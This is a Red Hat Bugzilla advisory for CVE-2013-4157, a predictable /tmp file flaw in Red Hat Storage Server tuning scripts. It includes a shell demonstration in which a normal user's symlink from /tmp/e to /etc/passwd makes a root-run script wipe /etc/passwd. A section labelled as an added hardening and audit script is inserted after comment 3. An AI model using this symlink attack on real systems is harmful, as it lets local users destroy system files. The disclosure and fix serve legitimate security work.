Bug 986516 - (CVE-2013-4157) CVE-2013-4157 Red Hat Storage Server 2.0: appliance-base / redhat-storage-server /tmp file creation vuln
Status: CLOSED ERRATA
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: low
Severity: low
Assigned To: Red Hat Product Security
Whiteboard: impact=low,public=20130904,reported=2...
Keywords: Security
Depends On: 986517 986518
Blocks: 986520
Reported: 2013-07-20 00:52 EDT by Kurt Seifried
Modified: 2014-09-08 02:47 EDT
Doc Type: Bug Fix
Last Closed: 2013-09-04 14:48:25 EDT
Attachments: None

Description Kurt Seifried 2013-07-20 00:52:15 EDT
Gowrishankar Rajaiyan (grajaiya@redhat.com) reports:

I found a potential security issue with redhat-storage-server-1.7.3-2.el6rhs.noarch, previously known as appliance-base-1.7.3-1.el6rhs, while verifying https://bugzilla.redhat.com/show_bug.cgi?id=910566. This issue also exists in the latest released version of RHS: https://rhn.redhat.com/rhn/software/channel/downloads/Download.do?cid=14689

Description: As part of /etc/tune-profiles/rhs-high-throughput/ktune.sh 
and /etc/tune-profiles/rhs-virtualization/ktune.sh
<snip>
for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do
</snip>

A file "e" is created in the /tmp directory. This information is public at https://bugzilla.redhat.com/show_bug.cgi?id=910566#c13 (I set it to private now, not sure if that helps). So any normal user can create a softlink from /tmp/e to /etc/passwd. The tuned profiles are executed as the root user, hence exposing a security loophole wherein a normal user can wipe out /etc/passwd.

Please guide on how to proceed from here.


A demonstration is as follows:
As normal user:
[shanks@localhost ~]$ id
uid=500(shanks) gid=500(shanks) groups=500(shanks)
[shanks@localhost ~]$ cd /tmp/

[shanks@localhost tmp]$ ln -s /etc/passwd e
[shanks@localhost tmp]$ ls -l
total 4
lrwxrwxrwx 1 shanks shanks 11 Jul 19 12:49 e -> /etc/passwd
-rwx------. 1 root root 391 Jul 19 09:04 ks-script-QuMjt3
-rwxr-xr-x. 1 root root 0 Jul 19 09:04 ks-script-QuMjt3.log
-rw------- 1 root root 0 Jul 19 09:04 tmp.ta4401DZd7
-rw-------. 1 root root 0 Jul 19 08:54 yum.log
[shanks@localhost tmp]$

As root:
[root@localhost ~]# tuned-adm profile rhs-high-throughput
Reverting to saved sysctl settings: [ OK ]
Calling '/etc/ktune.d/tunedadm.sh stop': setting readahead to 128 on 
brick devices:
[ OK ]
Reverting to cfq elevator: dm-0 dm-1 [ OK ]
Stopping tuned: [ OK ]
Switching to profile 'rhs-high-throughput'
Applying ktune sysctl settings:
/etc/ktune.d/tunedadm.conf: [ OK ]
Calling '/etc/ktune.d/tunedadm.sh start': setting readahead to 65536 on 
brick devices:
[ OK ]
Applying sysctl settings from /etc/sysctl.conf
Applying deadline elevator: dm-0 dm-1 [ OK ]
Starting tuned: 'import site' failed; use -v for traceback
[ OK ]
[root@localhost ~]# cat /etc/passwd
[root@localhost ~]#
Comment 3 Kurt Seifried 2013-07-20 01:30:57 EDT
Also there appear to be more vulnerabilities:

/etc/tune-profiles/rhs-virtualization/ktune.sh:  bricklist='/tmp/local-bricks.list'
/etc/tune-profiles/rhs-virtualization/ktune.sh:  for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do
/etc/tune-profiles/rhs-virtualization/ktune.sh:          done) 2>> /tmp/bricks.err
/etc/tune-profiles/rhs-virtualization/ktune.sh:          echo '* hard nofile 16384' ) > /tmp/limits.conf
/etc/tune-profiles/rhs-virtualization/ktune.sh:        mv /tmp/limits.conf $limits_conf
/etc/tune-profiles/rhs-virtualization/ktune.sh:        grep -v 'soft nofile' $limits_conf | grep -v 'hard nofile' > /tmp/limits.conf
/etc/tune-profiles/rhs-virtualization/ktune.sh:        mv /tmp/limits.conf $limits_conf
/etc/tune-profiles/rhs-high-throughput/ktune.sh:  bricklist='/tmp/local-bricks.list'
/etc/tune-profiles/rhs-high-throughput/ktune.sh:  for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do
/etc/tune-profiles/rhs-high-throughput/ktune.sh:          done) 2>> /tmp/bricks.err
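Both the description and comment 3 point at one defect class: a script that runs as root writes to fixed, predictable names under /tmp (/tmp/e, /tmp/local-bricks.list, /tmp/bricks.err, /tmp/limits.conf), so any local user who pre-creates one of those names as a symlink decides where root's write lands. The shell script below is an added example, not Red Hat's ktune.sh and not part of this bug report. It shows the usual fix, a private mktemp(1) directory with mode 0700 and an unpredictable name that holds every scratch file, and a small audit function that counts fixed /tmp paths in a script so a reviewer can catch the pattern before it ships. The function names, the miniature vols directory and the ktune-old.sh fragment are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not Red Hat's ktune.sh): hardened scratch-file handling
# for a root-run profile script, plus an audit check for the pattern
# reported in this bug.  Function names, the demo directory layout and
# the ktune-old.sh fragment below are constructed for the demonstration.

# Create a private scratch directory and print its path.  mktemp -d
# creates it with mode 0700 and an unpredictable suffix, so another
# local user cannot pre-create or symlink the paths root will write to.
make_scratch_dir() {
    mktemp -d "${TMPDIR:-/tmp}/ktune.XXXXXX"
}

# True when group and other hold no permission bits on $1 (mode 0700).
is_private_dir() {
    [ "$(ls -ld "$1" | cut -c5-10)" = "------" ]
}

# Hardened form of the brick-enumeration loop quoted in the report.
# $1 = glusterd vols directory, $2 = scratch dir from make_scratch_dir.
# find's stderr and the brick list both land inside the private dir
# instead of /tmp/e and /tmp/local-bricks.list.  Prints the brick count.
collect_bricks() {
    vols_dir=$1
    scratch=$2
    find "$vols_dir" -name bricks -type d \
        2>"$scratch/find.err" >"$scratch/local-bricks.list"
    wc -l <"$scratch/local-bricks.list" | tr -d ' '
}

# Audit helper: count the lines of script $1 that name a fixed path
# directly under /tmp.  Each hit is a candidate for the mktemp pattern.
count_fixed_tmp_paths() {
    grep -cE '(^|[^[:alnum:]_])/tmp/[[:alnum:]._-]+' "$1"
}

# --- demo on constructed input -------------------------------------------
demo_root=$(mktemp -d "${TMPDIR:-/tmp}/demo.XXXXXX")
scratch=$(make_scratch_dir)
trap 'rm -rf "$demo_root" "$scratch"' EXIT

# Constructed miniature of /var/lib/glusterd/vols with two brick dirs.
mkdir -p "$demo_root/vols/vol0/bricks" "$demo_root/vols/vol1/bricks"

# Constructed fragment carrying the unsafe /tmp redirections from comment 3.
cat >"$demo_root/ktune-old.sh" <<'EOF'
bricklist='/tmp/local-bricks.list'
for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do
    echo "$d"
done 2>> /tmp/bricks.err
EOF

echo "fixed /tmp paths in old script: $(count_fixed_tmp_paths "$demo_root/ktune-old.sh")"
echo "bricks found via private scratch dir: $(collect_bricks "$demo_root/vols" "$scratch")"
```

The audit regex is deliberately broad: it flags any literal `/tmp/<name>` reference, including ones that are later moved into place with `mv` (as the limits.conf lines in comment 3 do), because a `mv` over a symlink-controlled source is the same race in a different spot. The same mktemp directory serves every scratch file of one run, so the script needs exactly one `trap ... EXIT` to clean up.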
Comment 4 Murray McAllister 2013-09-04 07:34:45 EDT
Acknowledgements:

These issues were discovered by Gowrishankar Rajaiyan of Red Hat and Kurt Seifried of the Red Hat Security Response Team.
Comment 5 errata-xmlrpc 2013-09-04 14:10:55 EDT
This issue has been addressed in the following products:

  Red Hat Storage 2.0

Via RHSA-2013:1205 https://rhn.redhat.com/errata/RHSA-2013-1205.html
